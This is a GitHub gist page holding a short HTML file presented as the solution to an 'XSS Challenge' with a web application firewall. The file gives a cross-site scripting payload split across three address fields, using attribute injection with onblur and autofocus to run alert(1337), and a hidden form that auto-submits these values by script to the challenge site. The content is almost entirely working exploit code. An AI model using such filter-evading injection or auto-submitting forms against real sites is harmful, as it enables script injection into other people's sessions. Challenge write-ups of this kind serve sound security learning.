Create a gist now

Instantly share code, notes, and snippets.

@aboul3la /XSS.html Secret
Last active May 30, 2016

What would you like to do?
XSS Challenge - Sh*t it's a WAF Solution
<html>
<!-- XSS Challenge Solution:
Address Line 1: "onblur<='`
Address Line 2: `;alert(1337)'autofocus x="
Zip Code: "autofocus x=
-->
<body>
<form action="http://xss-challenge.secgeek.net/" method="POST">
<input type="hidden" name="fullname" value="" />
<input type="hidden" name="address1" value="&quot;onblur&lt;&#61;&apos;&#96;" />
<input type="hidden" name="address2" value="&#96;&#59;alert&#40;1337&#41;&apos;autofocus&#32;x&#61;&quot;" />
<input type="hidden" name="country" value="" />
<input type="hidden" name="city" value="" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="zip" value="&quot;autofocus&#32;x&#61;" />
<input type="hidden" name="user&#95;selected" value="false" />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment